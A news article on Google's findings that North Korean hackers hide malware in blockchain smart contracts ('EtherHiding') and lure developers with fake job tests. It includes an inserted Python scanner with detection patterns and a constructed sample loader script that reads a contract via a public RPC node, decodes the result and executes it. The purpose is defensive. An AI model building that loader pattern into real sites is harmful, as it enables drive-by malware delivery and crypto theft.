North Korean Hackers Hide Malicious Code in Blockchain: Shocking Google Revelation
Google Threat Analysis Group has identified a new tactic used by North Korean (DPRK) state-linked hackers: using public blockchain networks to distribute malware. The method, known as EtherHiding, lets attackers conceal malicious code in smart contracts, where it is extremely hard to detect. The technique is combined with social engineering campaigns aimed at stealing cryptocurrency assets and confidential information from developers and specialists in the cryptocurrency field.
The EtherHiding method was first recorded in 2023 and has evolved significantly since then. Attackers, in particular the UNC5342 group, compromise legitimate websites and embed JavaScript into them. These scripts interact with specially prepared smart contracts on blockchain networks such as BNB Smart Chain and Ethereum, where the malicious code is stored.
A key feature of the technique is its use of 'read-only' contract calls, which do not create transactions on the blockchain ledger. This lets attackers evade transaction-monitoring systems entirely while keeping fee costs to a minimum. When a victim visits a compromised site, the malicious code is activated automatically, stealing cryptocurrency funds and confidential data.
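The web-side half of the technique described above (a script on a compromised site that reads a blob from a contract via a read-only JSON-RPC call and then executes it) has a detectable shape. The following is an added example of a heuristic scanner for that shape; it is not code from Google or from the report, and the indicator names, weights and verdict thresholds are this example's own assumptions. The sample scripts are constructed: the addresses and call data are placeholders, and only the public RPC hostnames are real.

```python
import re
from dataclasses import dataclass

# Heuristic indicators for the EtherHiding loader pattern: a page script that
# makes a read-only JSON-RPC call to a contract and then runs what comes back.
# Names and weights are assumptions made for this example, not a published signature.
INDICATORS = {
    # read-only JSON-RPC methods: they return contract data without creating a transaction
    "rpc_read_only": (re.compile(r"\beth_(call|getStorageAt)\b"), 2),
    # a few real public RPC hosts; extend with whatever endpoints your environment allows
    "public_rpc_host": (re.compile(r"(bsc-dataseed\d*\.binance\.org|mainnet\.infura\.io|cloudflare-eth\.com)"), 1),
    # a 20-byte hex value, the shape of an EVM contract address
    "evm_address": (re.compile(r"\b0x[0-9a-fA-F]{40}\b"), 1),
    # turning a returned hex blob back into text before using it
    "hex_decode": (re.compile(r"(String\.fromCharCode|hexToUtf8|toUtf8String)"), 1),
    # executing fetched content as code
    "dynamic_exec": (re.compile(r"""(\beval\s*\(|new\s+Function\s*\(|document\.write\s*\(|createElement\s*\(\s*['"]script['"]\s*\))"""), 3),
}


@dataclass(frozen=True)
class ScanResult:
    indicators: tuple   # names of the indicators that matched, in INDICATORS order
    score: int          # sum of the matched weights
    verdict: str        # "high", "low" or "clean"


def scan_script(source: str) -> ScanResult:
    """Score one JavaScript source text against the indicator set."""
    hits = tuple(name for name, (pattern, _) in INDICATORS.items() if pattern.search(source))
    score = sum(INDICATORS[name][1] for name in hits)
    # What matters is the combination "reads contract data" AND "executes it":
    # read-only calls on their own are what every legitimate dapp front end does.
    if "rpc_read_only" in hits and "dynamic_exec" in hits:
        verdict = "high"
    elif "rpc_read_only" in hits or "dynamic_exec" in hits:
        verdict = "low"
    else:
        verdict = "clean"
    return ScanResult(hits, score, verdict)


def scan_many(scripts: dict) -> dict:
    """Scan a mapping of script name -> source, e.g. all inline/external scripts of a page."""
    return {name: scan_script(src) for name, src in scripts.items()}


# Constructed samples (assumption: not taken from any real incident).
SAMPLE_SCRIPTS = {
    # the loader shape: read from a contract, decode, execute (placeholder address and data)
    "suspicious.js": """
        const rpc = "https://bsc-dataseed1.binance.org/";
        const req = {jsonrpc: "2.0", id: 1, method: "eth_call",
                     params: [{to: "0x0000000000000000000000000000000000000000", data: "0x00"}, "latest"]};
        fetch(rpc, {method: "POST", body: JSON.stringify(req)})
          .then(r => r.json())
          .then(j => new Function(hexToText(j.result))());
        function hexToText(h) { return String.fromCharCode(...h.match(/../g).map(b => parseInt(b, 16))); }
    """,
    # an ordinary dapp reading a token balance: same read-only call, no code execution
    "dapp-balance.js": """
        const req = {jsonrpc: "2.0", id: 1, method: "eth_call",
                     params: [{to: "0x1111111111111111111111111111111111111111", data: "0x70a08231"}, "latest"]};
        fetch("https://mainnet.infura.io/v3/PROJECT_ID_PLACEHOLDER", {method: "POST", body: JSON.stringify(req)})
          .then(r => r.json()).then(j => render(j.result));
    """,
    # unrelated analytics snippet
    "analytics.js": "window.dataLayer = window.dataLayer || []; dataLayer.push({event: 'pageview'});",
}


if __name__ == "__main__":
    for name, result in scan_many(SAMPLE_SCRIPTS).items():
        print(f"{name}: {result.verdict} (score {result.score}) {list(result.indicators)}")
```

The verdict deliberately keys on the pairing of a read-only contract call with dynamic code execution rather than on the score alone: a wallet or exchange front end will trigger `rpc_read_only`, `public_rpc_host` and `evm_address` on every page load, so those alone should only produce a low-priority hit for triage. In practice the same scan belongs in a web-integrity check that diffs a site's served scripts against a known-good baseline, since the page text itself describes attackers injecting this code into otherwise legitimate sites.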
North Korean hackers develop complex social engineering schemes by creating fake companies, recruiting agencies, and fake profiles on professional networks. The main targets are software developers and blockchain technology specialists.
Attackers send offers of high-paying jobs or invitations to prestigious interviews, then move the conversation to messengers such as Discord and Telegram. During the so-called 'technical assessment' phase, victims are asked to complete a test task or to download files from popular repositories such as GitHub. These files contain the malicious payload.
In other cases, hackers arrange video calls in which the victim is shown a fake error message prompting them to download a 'fix'. The installed malware initiates a multi-stage attack: the second stage, called JADESNOW, steals data, and the third gives attackers long-term access to the victim's device and connected networks.
EtherHiding poses particular danger to the cryptocurrency community as it exploits fundamental blockchain properties—immutability and decentralization—as a platform for storing and spreading malicious code. Smart contracts effectively turn into 'bulletproof' command and control servers.
Google Threat Intelligence Group emphasizes the need for increased vigilance across the crypto industry. It recommends meticulously verifying the sources of job offers, avoiding downloads from unverified sources, and using modern cybersecurity tools. Organizations should implement multi-factor authentication and conduct regular employee training in recognizing phishing attacks.
Google's discovery demonstrates a new level of sophistication in cyberattacks by state actors. EtherHiding not only complicates the detection of malware but also sets a precedent for the use of blockchain technologies for criminal purposes. The crypto community will need to develop new methods of protection against such threats, including improved monitoring of smart contracts and analysis of suspicious interactions with blockchain networks.